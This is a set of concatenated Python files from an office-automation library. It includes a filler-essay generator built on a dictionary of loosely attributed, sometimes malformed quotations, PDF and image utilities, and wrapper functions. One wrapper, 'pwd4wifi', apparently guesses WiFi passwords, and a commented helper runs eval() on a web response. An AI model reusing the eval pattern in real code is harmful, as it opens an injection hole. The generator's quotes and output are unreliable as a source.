qoute = {
    "title": "学生会退会",
    "famous": [
        "爱迪生a，天才是百分之一的勤奋加百分之九十九的汗水。b",
        "查尔斯·史a，一个人几乎可以在任何他怀有无限热忱的事情上成功。b",
        "培根说过，深窥自己的心，而后发觉一切的奇迹在你自己。b",
        "歌德曾经a，流水在碰到底处时才会释放活力。b",
        "莎士比亚a，那脑袋里的智慧，就像打火石里的火花一样，不去打它是不肯出来的。b",
        "戴尔·卡耐基a，多数人都拥有自己不了解的能力和机会，都有可能做到未曾梦想的事情。b",
        "白哲特a，坚强的信念能赢得强者的心，并使他们变得更坚强。b",
        "伏尔泰a, 不经巨大的困难，不会有伟大的事业。b",
        "富勒曾经a, 苦难磨炼一些人，也毁灭另一些人。b",
        "文森特·皮尔a, 改变你的想法，你就改变了自己的世界。b",
        "拿破仑·希尔a, 不要等待，时机永远不会恰到好处。b",
        "塞涅卡a, 生命如同寓言，其价值不在与长短，而在与内容。b",
        "奥普拉·温弗瑞a, 你相信什么，你就成为什么样的人。b",
        "吕凯特a, 生命不可能有两次，但许多人连一次也不善于度过。b",
        "莎士比亚a, 人的一生是短的，但如果卑劣地过这一生，就太长了。b",
        "笛卡儿a, 我的努力求学没有得到别的好处，只不过是愈来愈发觉自己的无知。b",
        "左拉a, 生活的道路一旦选定，就要勇敢地走到底，决不回头。b",
        "米歇潘a, 生命是一条艰险的峡谷，只有勇敢的人才能通过。b",
        "吉姆·罗恩a, 要么你主宰生活，要么你被生活主宰。b",
        "日本谚语a, 不幸可能成为通向幸福的桥梁。b",
        "海贝尔a, 人生就是学校。在那里，与其说好的教师是幸福，不如说好的教师是不幸。b",
        "杰纳勒尔·乔治·S·巴顿a, 接受挑战，就可以享受胜利的喜悦。b",
        "德谟克利特a, 节制使快乐增加并使享受加强。b",
        "裴斯泰洛齐a, 今天应做的事没有做，明天再早也是耽误了。b",
        "歌德a, 决定一个人的一生，以及整个命运的，只是一瞬之间。b",
        "卡耐基a, 一个不注意小事情的人，永远不会成就大事业。b",
        "卢梭a, 浪费时间是一桩大罪过。b",
        "康德a, 既然我已经踏上这条道路，那么，任何东西都不应妨碍我沿着这条路走下去。b",
        "克劳斯·莫瑟爵士a, 教育需要花费钱，而无知也是一样。b",
        "伏尔泰a, 坚持意志伟大的事业需要始终不渝的精神。b",
        "亚伯拉罕·林肯a, 你活了多少岁不算什么，重要的是你是如何度过这些岁月的。b",
        "韩非a, 内外相应，言行相称。b",
        "富兰克林a, 你热爱生命吗？那么别浪费时间，因为时间是组成生命的材料。b",
        "马尔顿a, 坚强的信心，能使平凡的人做出惊人的事业。b",
        "笛卡儿a, 读一切好书，就是和许多高尚的人谈话。b",
        "塞涅卡a, 真正的人生，只有在经过艰难卓绝的斗争之后才能实现。b",
        "易卜生a, 伟大的事业，需要决心，能力，组织和责任感。b",
        "歌德a, 没有人事先了解自己到底有多大的力量，直到他试过以后才知道。b",
        "达尔文a, 敢于浪费哪怕一个钟头时间的人，说明他还不懂得珍惜生命的全部价值。b",
        "佚名a, 感激每一个新的挑战，因为它会锻造你的意志和品格。b",
        "奥斯特洛夫斯基a, 共同的事业，共同的斗争，可以使人们产生忍受一切的力量。　b",
        "苏轼a, 古之立大事者，不惟有超世之才，亦必有坚忍不拔之志。b",
        "王阳明a, 故立志者，为学之心也；为学者，立志之事也。b",
        "歌德a, 读一本好书，就如同和一个高尚的人在交谈。b",
        "乌申斯基a, 学习是劳动，是充满思想的劳动。b",
        "别林斯基a, 好的书籍是最贵重的珍宝。b",
        "富兰克林a, 读书是易事，思索是难事，但两者缺一，便全无用处。b",
        "鲁巴金a, 读书是在别人思想的帮助下，建立起自己的思想。b",
        "培根a, 合理安排时间，就等于节约时间。b",
        "屠格涅夫a, 你想成为幸福的人吗？但愿你首先学会吃得起苦。b",
        "莎士比亚a, 抛弃时间的人，时间也抛弃他。b",
        "叔本华a, 普通人只想到如何度过时间，有才能的人设法利用时间。b",
        "博a, 一次失败，只是证明我们成功的决心还够坚强。 维b",
        "拉罗什夫科a, 取得成就时坚持不懈，要比遭到失败时顽强不屈更重要。b",
        "莎士比亚a, 人的一生是短的，但如果卑劣地过这一生，就太长了。b",
        "俾斯麦a, 失败是坚忍的最后考验。b",
        "池田大作a, 不要回避苦恼和困难，挺起身来向它挑战，进而克服它。b",
        "莎士比亚a, 那脑袋里的智慧，就像打火石里的火花一样，不去打它是不肯出来的。b",
        "希腊a, 最困难的事情就是认识自己。b",
        "黑塞a, 有勇气承担命运这才是英雄好汉。b",
        "非洲a, 最灵繁的人也看不见自己的背脊。b",
        "培根a, 阅读使人充实，会谈使人敏捷，写作使人精确。b",
        "斯宾诺莎a, 最大的骄傲于最大的自卑都表示心灵的最软弱无力。b",
        "西班牙a, 自知之明是最难得的知识。b",
        "塞内加a, 勇气通往天堂，怯懦通往地狱。b",
        "赫尔普斯a, 有时候读书是一种巧妙地避开思考的方法。b",
        "笛卡儿a, 阅读一切好书如同和过去最杰出的人谈话。b",
        "邓拓a, 越是没有本领的就越加自命不凡。b",
        "爱尔兰a, 越是无能的人，越喜欢挑剔别人的错儿。b",
        "老子a, 知人者智，自知者明。胜人者有力，自胜者强。b",
        "歌德a, 意志坚强的人能把世界放在手中像泥块一样任意揉捏。b",
        "迈克尔·F·斯特利a, 最具挑战性的挑战莫过于提升自我。b",
        "爱迪生a, 失败也是我需要的，它和成功对我一样有价值。b",
        "罗素·贝克a, 一个人即使已登上顶峰，也仍要自强不息。b",
        "马云a, 最大的挑战和突破在于用人，而用人最大的突破在于信任人。b",
        "雷锋a, 自己活着，就是为了使别人过得更美好。b",
        "布尔沃a, 要掌握书，莫被书掌握；要为生而读，莫为读而生。b",
        "培根a, 要知道对好事的称颂过于夸大，也会招来人们的反感轻蔑和嫉妒。b",
        "莫扎特a, 谁和我一样用功，谁就会和我一样成功。b",
        "马克思a, 一切节省，归根到底都归结为时间的节省。b",
        "莎士比亚a, 意志命运往往背道而驰，决心到最后会全部推倒。b",
        "卡莱尔a, 过去一切时代的精华尽在书中。b",
        "培根a, 深窥自己的心，而后发觉一切的奇迹在你自己。b",
        "罗曼·罗兰a, 只有把抱怨环境的心情，化为上进的力量，才是成功的保证。b",
        "孔子a, 知之者不如好之者，好之者不如乐之者。b",
        "达·芬奇a, 大胆和坚定的决心能够抵得上武器的精良。b",
        "叔本华a, 意志是一个强壮的盲人，倚靠在明眼的跛子肩上。b",
        "黑格尔a, 只有永远躺在泥坑里的人，才不会再掉进坑里。b",
        "普列姆昌德a, 希望的灯一旦熄灭，生活刹那间变成了一片黑暗。b",
        "维龙a, 要成功不需要什么特别的才能，只要把你能做的小事做得好就行了。b",
        "郭沫若a, 形成天才的决定因素应该是勤奋。b",
        "洛克a, 学到很多东西的诀窍，就是一下子不要学很多。b",
        "西班牙a, 自己的鞋子，自己知道紧在哪里。b",
        "拉罗什福科a, 我们唯一不会改正的缺点是软弱。b",
        "亚伯拉罕·林肯a, 我这个人走得很慢，但是我从不后退。b",
        "美华纳a, 勿问成功的秘诀为何，且尽全力做你应该做的事吧。b",
        "俾斯麦a, 对于不屈不挠的人来说，没有失败这回事。b",
        "阿卜·日·法拉兹a, 学问是异常珍贵的东西，从任何源泉吸收都不可耻。b",
        "白哲特a, 坚强的信念能赢得强者的心，并使他们变得更坚强。 b",
        "查尔斯·史考伯a, 一个人几乎可以在任何他怀有无限热忱的事情上成功。 b",
        "贝多芬a, 卓越的人一大优点是：在不利与艰难的遭遇里百折不饶。b",
        "莎士比亚a, 本来无望的事，大胆尝试，往往能成功。b",
        "卡耐基a, 我们若已接受最坏的，就再没有什么损失。b",
        "德国a, 只有在人群中间，才能认识自己。b",
        "史美尔斯a, 书籍把我们引入最美好的社会，使我们认识各个时代的伟大智者。b",
        "冯学峰a, 当一个人用工作去迎接光明，光明很快就会来照耀着他。b",
        "吉格·金克拉a, 如果你能做梦，你就能实现它。b"
    ],
    "bosh": [
        "现在, 解决x的问题, 是非常非常重要的. 所以, ",
        "我们不得不面对一个非常尴尬的事实, 那就是, ",
        "x的发生, 到底需要如何做到, 不x的发生, 又会如何产生. ",
        "而这些并不是完全重要, 更加重要的问题是, ",
        "x, 到底应该如何实现. ",
        "带着这些问题, 我们来审视一下x. ",
        "所谓x, 关键是x需要如何写. ",
        "我们一般认为, 抓住了问题的关键, 其他一切则会迎刃而解.",
        "问题的关键究竟为何? ",
        "x因何而发生?",
        "每个人都不得不面对这些问题.  在面对这种问题时, ",
        "一般来讲, 我们都必须务必慎重的考虑考虑. ",
        "要想清楚, x, 到底是一种怎么样的存在. ",
        "了解清楚x到底是一种怎么样的存在, 是解决一切问题的关键.",
        "就我个人来说, x对我的意义, 不能不说非常重大. ",
        "本人也是经过了深思熟虑,在每个日日夜夜思考这个问题. ",
        "x, 发生了会如何, 不发生又会如何. ",
        "在这种困难的抉择下, 本人思来想去, 寝食难安.",
        "生活中, 若x出现了, 我们就不得不考虑它出现了的事实. ",
        "这种事实对本人来说意义重大, 相信对这个世界也是有一定意义的.",
        "我们都知道, 只要有意义, 那么就必须慎重考虑.",
        "既然如此, ",
        "那么, ",
        "我认为, ",
        "一般来说, ",
        "总结的来说, ",
        "既然如何, ",
        "经过上述讨论, ",
        "这样看来, ",
        "从这个角度来看, ",
        "我们不妨可以这样来想: ",
        "这是不可避免的. ",
        "可是，即使是这样，x的出现仍然代表了一定的意义. ",
        "x似乎是一种巧合，但如果我们从一个更大的角度看待问题，这似乎是一种不可避免的事实. ",
        "在这种不可避免的冲突下，我们必须解决这个问题. ",
        "对我个人而言，x不仅仅是一个重大的事件，还可能会改变我的人生. "
    ],
    "after": [
        "这不禁令我深思. ",
        "带着这句话, 我们还要更加慎重的审视这个问题: ",
        "这启发了我. ",
        "我希望诸位也能好好地体会这句话. ",
        "这句话语虽然很短, 但令我浮想联翩. ",
        "这句话看似简单，但其中的阴郁不禁让人深思. ",
        "这句话把我们带到了一个新的维度去思考这个问题: ",
        "这似乎解答了我的疑惑. "
    ],
    "before": [
        "曾经说过",
        "在不经意间这样说过",
        "说过一句著名的话",
        "曾经提到过",
        "说过一句富有哲理的话"
    ]
}

import random

data = qoute
qoute_list = data["famous"]  # a 代表前面垫话，b代表后面垫话
prefix_line = data["before"]  # 在名人名言前面弄点废话
post_line = data['after']  # 在名人名言后面弄点废话
line = data['bosh']  # 代表文章主要废话来源

theme = "学生会退会"

repeatability = 2


def create_article_shuffle(demo_list):
    global repeatability
    repeatability_pools = list(demo_list) * repeatability
    while True:
        random.shuffle(repeatability_pools)
        for repeatability_item in repeatability_pools:
            yield repeatability_item


next_line = create_article_shuffle(line)
next_qoute = create_article_shuffle(qoute_list)


def create_article_get_qoute():
    global next_qoute
    theme = next(next_qoute)
    theme = theme.replace("a", random.choice(prefix_line))
    theme = theme.replace("b", random.choice(post_line))
    return theme


def create_article_next_para():
    theme = ". "
    theme += "\r\n"
    theme += "    "
    return theme


def create_article_main(theme, line_num):
    for x in theme:
        tmp = str()
        while (len(tmp) < line_num):
            branches = random.randint(0, 100)
            if branches < 5:
                tmp += create_article_next_para()
            elif branches < 20:
                tmp += create_article_get_qoute()
            else:
                tmp += next(next_line)
        tmp = tmp.replace("x", theme)
        print(tmp)



# from fpdf import FPDF
# from office.lib.pdf import add_watermark_service
# import pikepdf
# from PyPDF2 import PdfFileReader, PdfFileWriter, PdfReader, PdfWriter
# from pdf2docx import Converter
# import os
# from pathlib import Path
# import fitz  # fitz就是pip install PyMuPDF
#
# from tqdm import tqdm
#
#
# class MainPDF():
#
#     def add_watermark(self):
#         pdf_file_in = input("请输入需要添加水印的文件位置：")  # 需要添加水印的文件
#         Watermark_Str = input("请输入需要添加的水印内容：")
#         print('=' * 20)
#         print('正在按要求，给你的PDF文件添加水印，请让程序飞一会儿~')
#         print('=' * 20)
#         pdf_file_mark = 'watermark.pdf'  # 水印文件
#         add_watermark_service.create_watermark(str(Watermark_Str))
#         pdf_file_out = '添加了水印的文件.pdf'  # 添加PDF水印后的文件
#         add_watermark_service.pdf_add_watermark(pdf_file_in, pdf_file_mark, pdf_file_out)
#         print("水印添加结束，请打开电脑上的这个位置，查看结果文件：{path}".format(path=os.getcwd()))
#
#     def add_watermark_by_parameters(self, pdf_file, mark_str, output_file_name):
#         """
#         给pdf添加水印，需要参数的版本
#         """
#         # pdf_file_in = input("请输入需要添加水印的文件位置：")  # 需要添加水印的文件
#         # Watermark_Str = input("请输入需要添加的水印内容：")
#         print('=' * 20)
#         print('正在按要求，给你的PDF文件添加水印，请让程序飞一会儿~')
#         print('=' * 20)
#         pdf_file_mark = 'watermark.pdf'  # 水印文件
#         add_watermark_service.create_watermark(str(mark_str))
#         pdf_file_out = output_file_name  # '添加了水印的文件.pdf'  # 添加PDF水印后的文件
#         add_watermark_service.pdf_add_watermark(pdf_file, pdf_file_mark, pdf_file_out)
#         print("水印添加结束，请打开电脑上的这个位置，查看结果文件：{path}".format(path=os.getcwd()))
#
#     def file2pdf(self, file_type, path, res_pdf='file2pdf.pdf'):
#         if file_type == 'txt':
#             pdf = FPDF()
#             pdf.add_page()  # Add a page
#             pdf.set_font("Arial", size=15)  # set style and size of font
#             f = open(path, "r")  # open the text file in read mode
#             # insert the texts in pdf
#             for x in f:
#                 pdf.cell(50, 5, txt=x, ln=1, align='C')
#             # pdf.output("path where you want to store pdf file\\file_name.pdf")
#             pdf.output(res_pdf)
#
#     def pdf2docx(self, file_path, output_path):
#         word_name = os.path.basename(file_path)[:-4] + '.docx'
#         word_path = Path(output_path) / word_name
#         cv = Converter(file_path)
#         cv.convert(word_path)
#         cv.close()
#
#     # 合并pdf
#     def merge2pdf(self, one_by_one, output):
#         """
#         @Author & Date  : CoderWanFeng 2022/5/16 23:33
#         @Desc  : merge_pdfs(paths=['开篇词.pdf', '中国元宇宙白皮书 (送审稿).pdf'], output='merge.pdf')
#         """
#         pdf_writer = PdfWriter()
#
#         for path in one_by_one:
#             pdf_reader = PdfReader(path)
#             # for page in tqdm(range(pdf_reader.getNumPages())):
#             for page in tqdm(range(len(pdf_reader.pages))):
#                 # 把每张PDF页面加入到这个可读取对象中
#                 # pdf_writer.addPage(pdf_reader.getPage(page))
#                 pdf_writer.add_page(pdf_reader.pages[page])
#
#         # 把这个已合并了的PDF文档存储起来
#         with open(output, 'wb') as out:
#             pdf_writer.write(out)
#
#     # PDF加密
#     def encrypt4pdf(self, path, password, res_pdf='encrypt.pdf'):
#         """
#         @Author & Date  : CoderWanFeng 2022/5/9 18:27
#         @Desc  : path: 存放文件的路径
#                 password: 你的密码
#                 res_pdf: 结果文件的名称 ，可以为空，默认是：encrypt.pdf
#         """
#         pdf = pikepdf.open(path)
#         pdf.save(res_pdf, encryption=pikepdf.Encryption(owner=password, user=password, R=4))
#         pdf.close()
#
#     # PDF解密
#     def decrypt4pdf(self, path, password, res_pdf='decrypt.pdf'):
#         pdf = pikepdf.open(path, password=password)
#         pdf.save(res_pdf)
#         pdf.close()
#
#     # def pdf2imgs(self, pdf_path: str, out_dir=".") -> None:
#     #     print('PDF开始转换，你可以加入交流群唠唠嗑：http://www.python4office.cn/wechat-group/')
#     #     pdfDoc = fitz.open(pdf_path)
#     #     if pdfDoc.pageCount > 50:
#     #         print('少年，你的PDF页数有点多哟，请耐心等待~')
#     #     for pg in range(pdfDoc.pageCount):
#     #         page = pdfDoc[pg]
#     #         rotate = int(0)
#     #         # 每个尺寸的缩放系数为1.3，这将为我们生成分辨率提高2.6的图像。
#     #         # 此处若是不做设置，默认图片大小为：792X612, dpi=96
#     #         zoom_x = 1.33333333  # (1.33333333-->1056x816)   (2-->1584x1224)
#     #         zoom_y = 1.33333333
#     #         mat = fitz.Matrix(zoom_x, zoom_y).preRotate(rotate)
#     #         pix = page.getPixmap(matrix=mat, alpha=False)
#
#     #         if not os.path.exists(out_dir):  # 判断存放图片的文件夹是否存在
#     #             os.makedirs(out_dir)  # 若图片文件夹不存在就创建
#
#     #         pix.writePNG(out_dir + '/' + 'images_%s.png' % pg)  # 将图片写入指定的文件夹内
#     #     print(f'PDF转换Image完成，图片在你指定的output文件夹{out_dir}，如果没有指定，默认是PDF同一个文件夹')
#
#     def pdf2imgs(self, pdf_path: str, out_dir=".") -> None:
#         print('PDF开始转换，你可以加入交流群唠唠嗑：http://www.python4office.cn/wechat-group/')
#         pdfDoc = fitz.open(pdf_path)
#         if pdfDoc.page_count > 50:
#             print('少年，你的PDF页数有点多哟，请耐心等待~')
#         for pg in tqdm(range(pdfDoc.page_count)):
#             page = pdfDoc[pg]
#             rotate = int(0)
#             # 每个尺寸的缩放系数为1.3，这将为我们生成分辨率提高2.6的图像。
#             # 此处若是不做设置，默认图片大小为：792X612, dpi=96
#             zoom_x = 1.33333333  # (1.33333333-->1056x816)   (2-->1584x1224)
#             zoom_y = 1.33333333
#             mat = fitz.Matrix(zoom_x, zoom_y).prerotate(rotate)
#             pix = page.get_pixmap(matrix=mat, alpha=False)
#
#             if not os.path.exists(out_dir):  # 判断存放图片的文件夹是否存在
#                 os.makedirs(out_dir)  # 若图片文件夹不存在就创建
#
#             pix.save(out_dir + '/' + 'images_%s.png' % pg)  # 将图片写入指定的文件夹内
#         print(f'PDF转换Image完成，图片在你指定的output文件夹{out_dir}，如果没有指定，默认是PDF同一个文件夹')
#
#     def add_img_watermark(self, pdf_file_in, pdf_file_mark, pdf_file_out):
#         add_watermark_service.pdf_add_watermark(pdf_file_in, pdf_file_mark, pdf_file_out)



from office.core.TestTypes.RuimingType import MainRuiming
from office.lib.utils.except_utils import except_dec

ruiming = MainRuiming()


# @except_dec()
def screen_unmarked_image(dir_path):
    ruiming.screen_unmarked_image(dir_path)


# @except_dec()
def change_label_in_xml(dir_path, old_label, new_label):
    ruiming.change_label_in_xml(dir_path, old_label, new_label)


# @except_dec()
def screen_without_label_json_file(dir_path):
    ruiming.screen_without_label_json_file(dir_path)


# import unittest
#
# from office.api.markdown import *
#
#
# class TestMarkdown():
#     def test_markdown_link_image_to_base64(self, ):
#         # TODO:提交测试文档
#         markdown_link_image_to_base64(
#             markdown_path=r"C:\Users\37386\PycharmProjects\python-office\testfile\markdown\test.md")
#
#     def test_check_local_dir_image_link_markdown(self):
#         # TODO:提交测试文档
#         check_local_dir_image_link_markdown(
#             markdown_path=r"C:\Users\37386\PycharmProjects\python-office\testfile\markdown\test.md",
#             image_path=r"C:\Users\37386\PycharmProjects\python-office\testfile\markdown\test.assets")



# import os
# import time
#
# from office.lib.ppt.ppt2pdf_service import ppt2pdf_single
#
#
# class MainPPT():
#
#     def ppt2pdf(self, path):
#         """
#         @Author & Date  : CoderWanFeng 2022/5/9 23:34
#         @Desc  : path:存放ppt的路径
#         """
#         # 如果是相对路径，转为绝对路径
#         if not os.path.isabs(path):
#             path = os.path.abspath(path)
#         # 列出指定目录的内容
#         filenames = os.listdir(path)
#         # for循环依次访问指定目录的所有文件名
#         for filename in filenames:
#             # 判断文件的类型，对所有的ppt文件进行处理(ppt文件以ppt或者pptx结尾的)
#             if filename.endswith('ppt') or filename.endswith('pptx'):
#                 # print(filename)           # PPT素材1.pptx -> PPT素材1.pdf
#                 # 将filename以.进行分割，返回2个信息，文件的名称和文件的后缀名
#                 base, ext = filename.split('.')  # base=PPT素材1 ext=pdf
#                 new_name = base + '.pdf'  # PPT素材1.pdf
#                 # ppt文件的完整位置: C:/Users/Administrator/Desktop/PPT办公自动化/ppt/PPT素材1.pptx
#                 filename = path + '/' + filename
#                 # pdf文件的完整位置: C:/Users/Administrator/Desktop/PPT办公自动化/ppt/PPT素材1.pdf
#                 output_filename = path + '/' + new_name
#                 # 将ppt转成pdf文件
#                 ppt2pdf_single(filename, output_filename)
#                 time.sleep(3)



# import os
# # from lib.image import add_watermark_service
# # 生成词云需要使用的类库
# from PIL import Image
# from alive_progress import alive_bar
#
# from office.lib.image import add_watermark_service
# import base64
# import requests
#
#
# class MainImage():
#
#     #TODO:自动生成gif
#     def image2gif(self):
#         im = Image.open("1.jpg")
#         images = []
#         images.append(Image.open('2.jpg'))
#         images.append(Image.open('3.jpg'))
#         im.save('gif.gif', save_all=True, append_images=images, loop=1, duration=1, comment=b"aaabb")
#
#     # from wordcloud import WordCloud
#     # import jieba
#
#     # def txt2wordcloud(filename, color="white", result_file="your_wordcloud.png"):
#     #     """
#     #     @Author & Date  : CoderWanFeng 2022/4/28 9:26
#     #     @Desc  : 生成词云的代码，可以添加更多个性化功能
#     #     @Return  ：
#     #     """
#     #     with open(filename, encoding='utf8') as fp:
#     #         text = fp.read()
#     #         # 将读取的中文文档进行分词
#     #         # 接收分词的字符串
#     #         word_list = jieba.cut(text)
#     #         # 分词后在单独个体之间加上空格
#     #         cloud_text = " ".join(word_list)
#     #
#     #         # 生成wordcloud对象
#     #         wc = WordCloud(background_color=color,
#     #                        max_words=200,
#     #                        min_font_size=15,
#     #                        max_font_size=50,
#     #                        width=400,
#     #                        font_path="msyh.ttc",  # 默认的简体中文字体，没有会报错
#     #                        )
#     #         wc.generate(cloud_text)
#     #         wc.to_file(result_file)
#
#     def add_watermark(self, file, mark, out="output", color="#8B8B1B", size=30, opacity=0.15, space=75, angle=30):
#         """
#         @Author & Date  : demo 2022/5/6 14:33
#         @Desc  : 给图片添加水印
#         @Return  ： 添加了水印的图片，输出到out指定的文件夹
#         """
#         if os.path.isdir(file):
#             names = os.listdir(file)
#             with alive_bar(len(names)) as bar:
#                 for name in names:
#                     bar()
#                     image_file = os.path.join(file, name)
#                     add_watermark_service.add_mark2file(image_file, mark, out, color, size, opacity, space, angle)
#         else:
#             add_watermark_service.add_mark2file(file, mark, out, color, size, opacity, space, angle)
#
#     def get_access_token(self, client_api, client_secret):
#
#         # 获取token的API
#         url = 'https://aip.baidubce.com/oauth/2.0/token'
#         # 获取access_token需要的参数
#         params = {
#             # 固定参数
#             'grant_type': 'client_credentials',
#             # 必选参数，传入你的API Key
#             'client_id': client_api,
#             # 必选参数，传入你的Secret Key
#             'client_secret': client_secret
#         }
#         # 发送请求，获取响应数据
#
#         response = requests.post(url, params)
#         # 将响应的数据转成字典类型，然后取出access_token
#         access_token = eval(response.text)['access_token']
#         # 将access_token返回
#         return access_token
#
#     def img2Cartoon(self, path, client_api, client_secret):
#         print('=' * 30)
#         print('正在进行动漫头像的转换')
#         print('本仓库的视频教程：http://t.cn/A6aAvu47')
#         print('这个接口调用的是百度AI平台的免费试用接口（200次），如果代码报错，大概率是试用次数没有了')
#         print('获取免费使用次数的教程，我整理在这个文档里了：https://python-office.com/office/image.html')
#         print('=' * 30)
#
#         # 头像动漫化的API
#         url = 'https://aip.baidubce.com/rest/2.0/image-process/v1/selfie_anime'
#         # 以二进制的方式读取原始图片
#         origin_im = open(path, 'rb')
#         # 将图片进行base64编码
#         path = base64.b64encode(origin_im.read())
#         # 关闭原图片
#         origin_im.close()
#         # 请求的headers信息，固定写法
#         headers = {'content-type': 'application/x-www-form-urlencoded'}
#         # 请求的参数
#         params = {
#             # 开始获取的access_token
#             'access_token': self.get_access_token(client_api, client_secret),
#             # 图片的base64编码
#             'image': path,
#         }
#         # 发送请求
#         response = requests.post(url, data=params, headers=headers)
#         # 对响应结果进行处理
#         if response:
#             # 打开一个文件
#             f = open('result.jpg', 'wb')
#             try:
#                 # 获取动漫头像
#                 anime = response.json()['image']
#             except:
#                 raise Exception('你没有开通百度AI账号，错误原因以及【免费】开通方式，见：https://mp.weixin.qq.com/s/5Eyk2j20jzSaVcr1DTsfvw')
#             # 对返回的头像进行解码
#             anime = base64.b64decode(anime)
#             # 将头像写入文件当中
#             f.write(anime)
#             f.close()
#         print('*' * 20 + "{}".format('动漫头像名称：result.jpg') + '*' * 20)
#         print('*' * 20 + "{}".format('您的动漫头像转换完毕，请在本代码运行的文档里查看') + '*' * 20)
#
#     def down4img(self, url, output_name, type):
#         """
#         下载指定url的一张图片，支持所有格式:jpg\png\gif .etc
#         """
#         response = requests.get(url, stream=True)
#         with open('.'.join((output_name, type)), 'wb') as output_img:
#             for chunk in response:
#                 output_img.write(chunk)
#             output_img.close()
#             print(f"下载成功，图片名称：{'.'.join((output_name, type))}")



# import PyOfficeRobot
#
#
# class MainWeChat():
#     def send_message(self, who, message):  # 给指定人，发送消息
#         PyOfficeRobot.chat.send_message(who, message)
#
#     def send_file(self, who, file):  # 给指定人，发送文件
#         PyOfficeRobot.file.send_file(who, file)



# import glob
#
#
# class MainSearchByContent():
#     def search_by_content(self, search_path, content):  # 定义 search() 函数，传入 "path" 文件路径， "target" 要查找的目标文件
#         """
#         获取当前路径下所有内容
#         判断每个内容的类型（文件夹还是文件）
#         若是文件夹则继续递归查找
#         """
#         glob_path = glob.glob(search_path)
#         for file_path in glob_path:  # for 循环判断递归查到的内容是文件夹还是文件
#             if glob.os.path.isdir(file_path):  # 若是文件夹，继续将该文件夹的路径传给 search() 函数继续递归查找
#                 _path = glob.os.path.join(file_path, '*')
#                 self.search_by_content(_path, content)
#             else:  # 若是文件，则将该查询到的文件所在路径插入 final_result 空列表
#                 try:
#                     with open(file_path, 'r') as file:  # 利用 open() 函数读取文件，并通过 try...except... 捕获不可读的文件格式（.zip 格式）
#                         if content in file.read():
#                             print('该文件内，包含：【{}】'.format(content) + ' | ' * 2 + file_path)
#                 except:
#                     continue



from office.lib.utils.except_utils import except_dec

# from office.core.ToolsType import wftools

# wftools = wftools()

import wftools


# @except_dec()
def transtools(to_lang, content):
    wftools.transtools(to_lang, content)


# @except_dec()
def qrcodetools(url):
    wftools.qrcodetools(url)


# @except_dec()
def passwordtools(len=8):
    wftools.passwordtools(len)


# @except_dec()
def weather():
    wftools.weather()


# 通过url，获取ip地址
# # @except_dec()
def url2ip(url):
    wftools.url2ip(url)


# 通过url，获取ip地址
# @except_dec()
def lottery8ticket():
    wftools.lottery8ticket()


# @except_dec()
def create_article(theme, line_num=200):
    wftools.create_article(theme, line_num)


# @except_dec()
def pwd4wifi(len_pwd=8, pwd_list=[]):
    wftools.pwd4wifi(len_pwd, pwd_list)



# import base64
# import pathlib
#
#
# class MainMarkdown():
#
#     def markdown_link_image_to_base64(self, markdown_path):
#         markdown_path = pathlib.Path(markdown_path)
#         if markdown_path.is_file() and markdown_path.suffix == ".md":
#             i = 0  # 图片计数变量
#             image_base64_list = []  # 图片base64编码列表
#             markdown_file = open(markdown_path, encoding="utf-8")
#             new_markdown_file = open(markdown_path.parent.joinpath(markdown_path.name[:-3:] + "(base64).md"), "x",
#                                      encoding="utf-8")
#             markdown_file = markdown_file.readlines()
#             for line in markdown_file:
#                 # 按行遍历文件
#                 if line[:2:] == "![":
#                     # 如果该行有链接图片
#                     i = i + 1
#                     this_image_path = pathlib.Path(line[line.rfind("(") + 1:line.rfind(")"):])
#                     if not this_image_path.is_absolute():
#                         # Python文件和markdown文件通常不在同一路径，相对路径基准不同，故需要判断链接图片路径是否为绝对路径。
#                         this_image_path = markdown_path.parent.joinpath(this_image_path).resolve()
#                     this_image_file = open(this_image_path, "rb")
#                     this_image_base64_data = base64.b64encode(this_image_file.read())
#                     # 对链接的图片进行base64编码
#                     line = line[:line.index("("):] + f"[image{str(i)}]" + "\n"
#                     image_base64_list.append(
#                         f"[image{str(i)}]: " + "data:image/" + this_image_path.suffix + ";base64," + str(
#                             this_image_base64_data)[2:-1:] + "\n")
#                 new_markdown_file.writelines(line)
#             for i in image_base64_list:
#                 # 遍历存放base64编码的列表
#                 if markdown_file[-1] != "\n":
#                     new_markdown_file.writelines("\n")
#                 # 判断最后一行是否为空行，如果不是则写入换行符
#                 new_markdown_file.writelines(i)
#                 # 将图片的base64编码写入新文件
#         elif not markdown_path.is_file():
#             print("markdown文件路径输入有误，请检查！")
#         elif markdown_path.suffix != ".md":
#             print("请输入.md文件的路径！")
#
#     def check_local_dir_image_link_markdown(self, markdown_path, image_path):
#         """
#         :param markdown_path: markdown文件路径
#         :param image_path: 本地图片存放路径
#         """
#         markdown_path = pathlib.Path(markdown_path)
#         image_path = pathlib.Path(image_path)
#         # 转换路径为对象
#         if markdown_path.is_file() and image_path.is_dir():
#             print("检查中……")
#             markdown_image_list = []  # markdown文件中链接的图片列表
#             markdown_file = open(markdown_path, encoding="utf-8")
#             markdown_file = markdown_file.readlines()
#             for line in markdown_file:
#                 # 按行遍历文件
#                 if line[:2:] == "![":
#                     # 如果该行有链接图片
#                     this_image_path = pathlib.Path(line[line.rfind("(") + 1:line.rfind(")"):])
#                     # 提取链接图片路径
#                     if this_image_path.is_absolute():
#                         # Python文件和markdown文件通常不在同一路径，相对路径基准不同，故需要判断链接图片路径是否为绝对路径。如果是则直接添加进列表，如果不是则要拼接上markdown所在的路径
#                         markdown_image_list.append(this_image_path)
#                     else:
#                         this_image_path = markdown_path.parent.joinpath(this_image_path).resolve()
#                         markdown_image_list.append(this_image_path)
#             local_dir_image_list = []
#             for i in list(image_path.glob("**/*")):
#                 local_dir_image_list.append(i.resolve())
#             markdown_image_set = set(markdown_image_list)
#             local_dir_image_set = set(local_dir_image_list)
#             if local_dir_image_set ^ markdown_image_set != (
#                     local_dir_image_set ^ markdown_image_set) & local_dir_image_set:
#                 """
#                 如果有文件夹中有图片未被链接到markdown中或markdown中链接了其他路径的图片，则local_dir_image_set ^ markdown_image_set不为空
#                 (local_dir_image_set ^ markdown_image_set) & local_dir_image_set为未被链接到markdown中的图片
#                 如果两个集合不相等，则代表markdown中链接了其他路径的图片
#                 """
#                 print("文档中有链接其他路径的图片，请检查！ ")
#                 other_dir_image_list = list((local_dir_image_set ^ markdown_image_set) & markdown_image_set)
#                 print("其他路径图片列表：")
#                 for i in other_dir_image_list:
#                     print(str(i))
#                 print()
#             if (local_dir_image_set ^ markdown_image_set) & local_dir_image_set != set():
#                 print("未被链接图片列表：")
#                 for i in local_dir_image_set ^ markdown_image_set & local_dir_image_set:
